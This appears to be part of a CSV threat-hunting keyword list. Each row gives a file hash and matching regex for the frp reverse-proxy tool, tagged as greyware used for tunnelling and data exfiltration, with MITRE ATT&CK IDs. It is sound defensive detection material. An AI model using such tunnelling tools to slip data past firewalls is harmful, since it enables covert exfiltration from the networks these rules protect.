"*b18153bc7a6d6627f402380a6e5ac01b631207df54d7fcc0d89a8f6f81521401*",".{0,1000}b18153bc7a6d6627f402380a6e5ac01b631207df54d7fcc0d89a8f6f81521401.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b1c9ee1dff229639c43c60e39a6023798b5c96ccd38df7e3edd41cfb6990c90a*",".{0,1000}b1c9ee1dff229639c43c60e39a6023798b5c96ccd38df7e3edd41cfb6990c90a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b1dc5923bfb2c9d0d1e271e20cce3615f8d23d276e376d9c566dc5400f14282d*",".{0,1000}b1dc5923bfb2c9d0d1e271e20cce3615f8d23d276e376d9c566dc5400f14282d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b2768608b33e964fc7067657f385ba15a69762b0a875db47981953d70dd36af7*",".{0,1000}b2768608b33e964fc7067657f385ba15a69762b0a875db47981953d70dd36af7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b2cb915a6e66c99fcceceae07b08d28002c575a3bc2c6aa8ea88c9ae45294be3*",".{0,1000}b2cb915a6e66c99fcceceae07b08d28002c575a3bc2c6aa8ea88c9ae45294be3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b330c29f6ef91302c6a2b9a0f6e86c77b498d0babb60fe182440f1b97e0554cb*",".{0,1000}b330c29f6ef91302c6a2b9a0f6e86c77b498d0babb60fe182440f1b97e0554cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b430c31a107a7c5e48899e3ee800f39aa50300d3d76f87bb7afb7ede58875cfe*",".{0,1000}b430c31a107a7c5e48899e3ee800f39aa50300d3d76f87bb7afb7ede58875cfe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b48943e9641fde4b91e0032fa031599fdbe3f9cebdd8612cec9e3477aecf2866*",".{0,1000}b48943e9641fde4b91e0032fa031599fdbe3f9cebdd8612cec9e3477aecf2866.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b4a40bfaca19d5b8570be95ea2839fa82c7814c561510c3e3807ce273ee7c7cf*",".{0,1000}b4a40bfaca19d5b8570be95ea2839fa82c7814c561510c3e3807ce273ee7c7cf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b509e7d50b164aaa62b30efb189caf965615ce266d51c243e494bca14d2f2864*",".{0,1000}b509e7d50b164aaa62b30efb189caf965615ce266d51c243e494bca14d2f2864.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b53e3cba1a8a3ebaa1e7d04f647eee3aed3417740692e346dc460c813403475c*",".{0,1000}b53e3cba1a8a3ebaa1e7d04f647eee3aed3417740692e346dc460c813403475c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b64b34521d1942f05b9224bb21d025af5c0ae99fa2e2dff635f26f91d91a6188*",".{0,1000}b64b34521d1942f05b9224bb21d025af5c0ae99fa2e2dff635f26f91d91a6188.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b68640e6866a22639186095138657c53b0bb6626ec0438b488d1a2ffdde23155*",".{0,1000}b68640e6866a22639186095138657c53b0bb6626ec0438b488d1a2ffdde23155.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b7a7814aedd230b66e11f3626aa505a2a701d6afc19bc8be2143955bfa3c1d6e*",".{0,1000}b7a7814aedd230b66e11f3626aa505a2a701d6afc19bc8be2143955bfa3c1d6e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b7f2414b1d8be99157e5b25ea578938520c45d094534fffb2e515796559b9b29*",".{0,1000}b7f2414b1d8be99157e5b25ea578938520c45d094534fffb2e515796559b9b29.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b83a269ce5fb9ff099695165a5d3565646f6032579c4bc6925c63fe8100aee0f*",".{0,1000}b83a269ce5fb9ff099695165a5d3565646f6032579c4bc6925c63fe8100aee0f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b8a048ff117640b07633cd2cb357b07ab64fd1817f6f68f9926c555b293d2a69*",".{0,1000}b8a048ff117640b07633cd2cb357b07ab64fd1817f6f68f9926c555b293d2a69.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b8a22f70d3451a7f4b8e1718da28ef02dfb38d37193bcbdc1df39eb52d0da40b*",".{0,1000}b8a22f70d3451a7f4b8e1718da28ef02dfb38d37193bcbdc1df39eb52d0da40b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b993db8bf609419a850d3233f97bf422de7e5e54576120c36de0ad703e541bf2*",".{0,1000}b993db8bf609419a850d3233f97bf422de7e5e54576120c36de0ad703e541bf2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b9a1a2387b9b07ec6be9d28e5ed9639c1ea29d41a84bc3a62b39ab476459b1ff*",".{0,1000}b9a1a2387b9b07ec6be9d28e5ed9639c1ea29d41a84bc3a62b39ab476459b1ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*b9c79acc881c58b0185465a5ded032d6210637f860712f04ecb800b66453d125*",".{0,1000}b9c79acc881c58b0185465a5ded032d6210637f860712f04ecb800b66453d125.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ba4439ded52eb5c5994dd10181ff83ef350933753198e50bf04b5f21333f2a12*",".{0,1000}ba4439ded52eb5c5994dd10181ff83ef350933753198e50bf04b5f21333f2a12.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bb8734f2be2907a2923aedf43757d6ff85a7c66af789b8dbef34ddaf2194f05f*",".{0,1000}bb8734f2be2907a2923aedf43757d6ff85a7c66af789b8dbef34ddaf2194f05f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bbb1ab095f30e9ecf1b745579f6ecff80eff11fb712f2bc364a656fbec89f73b*",".{0,1000}bbb1ab095f30e9ecf1b745579f6ecff80eff11fb712f2bc364a656fbec89f73b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bc283cb6e280e5fd5089216c8362003235dcf371e9f99bbc14462a0ef05c0b53*",".{0,1000}bc283cb6e280e5fd5089216c8362003235dcf371e9f99bbc14462a0ef05c0b53.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bc886aea03ddb2d4201501904a25816ac962cd3fbe6bc7fab3ca05357069666d*",".{0,1000}bc886aea03ddb2d4201501904a25816ac962cd3fbe6bc7fab3ca05357069666d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bce6f8df72e0f942a3eaeca45ed59fbf929d887b9fcd30350944c5f72287cb73*",".{0,1000}bce6f8df72e0f942a3eaeca45ed59fbf929d887b9fcd30350944c5f72287cb73.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bf8ab462d70a288b7ff2e9dda8151d16340ec4758843a619a936b7541f52fe54*",".{0,1000}bf8ab462d70a288b7ff2e9dda8151d16340ec4758843a619a936b7541f52fe54.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bf980fa58499e947581c6b89b100d55c1d417fdda6f7544422a4a6400248e20d*",".{0,1000}bf980fa58499e947581c6b89b100d55c1d417fdda6f7544422a4a6400248e20d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*bfbc703139c2fcf59d2fac2bb4afe3e60dd5f77dc12d84c8f420260f136c6721*",".{0,1000}bfbc703139c2fcf59d2fac2bb4afe3e60dd5f77dc12d84c8f420260f136c6721.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c0c02d53dea74824ba7a5a278d5e9974aed9d9d5f988606b9ad3507b8b051a7e*",".{0,1000}c0c02d53dea74824ba7a5a278d5e9974aed9d9d5f988606b9ad3507b8b051a7e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c14ccd69607c34707120e7c2d2df9b6c0a11c7f40e22f116d75838e2038edba3*",".{0,1000}c14ccd69607c34707120e7c2d2df9b6c0a11c7f40e22f116d75838e2038edba3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c14d5be9b9d80a48354c04dd1c3f80167abae94a1854d2f5116e4e5a0da89b91*",".{0,1000}c14d5be9b9d80a48354c04dd1c3f80167abae94a1854d2f5116e4e5a0da89b91.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c17291696d623106324b9bad894599325a90148d7d19970b9142a445b789b571*",".{0,1000}c17291696d623106324b9bad894599325a90148d7d19970b9142a445b789b571.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c1b0377ee72dc62221e2c8ecf913a34e230222e86f5291f0813474a4fd7e9b24*",".{0,1000}c1b0377ee72dc62221e2c8ecf913a34e230222e86f5291f0813474a4fd7e9b24.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c20f8abf5e0933bfd88fa974ad3a005c72f494aafc021916927774ab0ce6ca46*",".{0,1000}c20f8abf5e0933bfd88fa974ad3a005c72f494aafc021916927774ab0ce6ca46.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c32b3159a8aa089b08222987a32b9856c046c276898613c75eec62d370df7e01*",".{0,1000}c32b3159a8aa089b08222987a32b9856c046c276898613c75eec62d370df7e01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c35d5b705e2b321cf612bcdeb44ee27392d6a1202248e8ec30bf178adf00f9da*",".{0,1000}c35d5b705e2b321cf612bcdeb44ee27392d6a1202248e8ec30bf178adf00f9da.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c35dcc7b9549eacce4d5b34a07a3d102b0c631ef4b72682ce0472f65b8777d4a*",".{0,1000}c35dcc7b9549eacce4d5b34a07a3d102b0c631ef4b72682ce0472f65b8777d4a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c3b011e15c03348592d4a2adcdb90994e7ed29a43f572945505a429c12645215*",".{0,1000}c3b011e15c03348592d4a2adcdb90994e7ed29a43f572945505a429c12645215.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c44853992b0d6d3f9f5c777038590ee6a5869dbeb6362dfa5537e9d730aa26f6*",".{0,1000}c44853992b0d6d3f9f5c777038590ee6a5869dbeb6362dfa5537e9d730aa26f6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c53b188ec3eb09f34484d2576f957e61522875c0e7a99e67722d41b2b57cdb4d*",".{0,1000}c53b188ec3eb09f34484d2576f957e61522875c0e7a99e67722d41b2b57cdb4d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c57526a8a0010b811b9bd367704125033fc71774f6a66dcfd4224ec5478e0490*",".{0,1000}c57526a8a0010b811b9bd367704125033fc71774f6a66dcfd4224ec5478e0490.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c5b32aaedc7785b980be37519d95d0d3dc3ae86b3943bbf2ad7cb5dfc57460f0*",".{0,1000}c5b32aaedc7785b980be37519d95d0d3dc3ae86b3943bbf2ad7cb5dfc57460f0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c671953a8131c23c8039827f79fc96c021aac1e2b6dfff805ee68f490847b3ef*",".{0,1000}c671953a8131c23c8039827f79fc96c021aac1e2b6dfff805ee68f490847b3ef.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c68f67a262cf61a81945326e0e0c9e2a3dce209c3125bb0f05a16921141f4231*",".{0,1000}c68f67a262cf61a81945326e0e0c9e2a3dce209c3125bb0f05a16921141f4231.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c6f00c7458e7546b9339ce65805b2969abf55f95698f0b2f0904ed85f187b3fa*",".{0,1000}c6f00c7458e7546b9339ce65805b2969abf55f95698f0b2f0904ed85f187b3fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c7b22ed0a87596cd839b555e4992d80691359e75409063b6dca2dda96e7da480*",".{0,1000}c7b22ed0a87596cd839b555e4992d80691359e75409063b6dca2dda96e7da480.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c842849be22802e6500167fc34fac869c584ad1f70b6c56dcc66d7391171d567*",".{0,1000}c842849be22802e6500167fc34fac869c584ad1f70b6c56dcc66d7391171d567.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c87ffc18bfa386cf946156f91fb8649a0cdbcd762550a0b8ab1f4774cb608455*",".{0,1000}c87ffc18bfa386cf946156f91fb8649a0cdbcd762550a0b8ab1f4774cb608455.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*c992b9a8a53c53465f035d5e254ecc1a9455f260fd110fe1600d5da4a37df413*",".{0,1000}c992b9a8a53c53465f035d5e254ecc1a9455f260fd110fe1600d5da4a37df413.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ca1f8ec6c7236e7c9c31c1c40626c05a597e3bc6f647c1325439e2f825da9aee*",".{0,1000}ca1f8ec6c7236e7c9c31c1c40626c05a597e3bc6f647c1325439e2f825da9aee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ca7baeb243b5c264847067f6e5619311223f1741f73d5371ff7fa90698ff5a3b*",".{0,1000}ca7baeb243b5c264847067f6e5619311223f1741f73d5371ff7fa90698ff5a3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cac2bc6fccb071789d7acc95f02470cfb935cfc9c7c6a1e6d91457e4ff11e8e1*",".{0,1000}cac2bc6fccb071789d7acc95f02470cfb935cfc9c7c6a1e6d91457e4ff11e8e1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cc928db0c984d3a7e9822ebb7ac897ddb90f43848488a5c3261b5704085fa92a*",".{0,1000}cc928db0c984d3a7e9822ebb7ac897ddb90f43848488a5c3261b5704085fa92a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*cd1cdad2d88d638a820cac9c562bccba8dbbc42d3ac1ec8482d12105325a3adc*",".{0,1000}cd1cdad2d88d638a820cac9c562bccba8dbbc42d3ac1ec8482d12105325a3adc.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*ce18273ca20bd38c567b0355ca2c85575651b39249294969daa51e568077a872*",".{0,1000}ce18273ca20bd38c567b0355ca2c85575651b39249294969daa51e568077a872.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
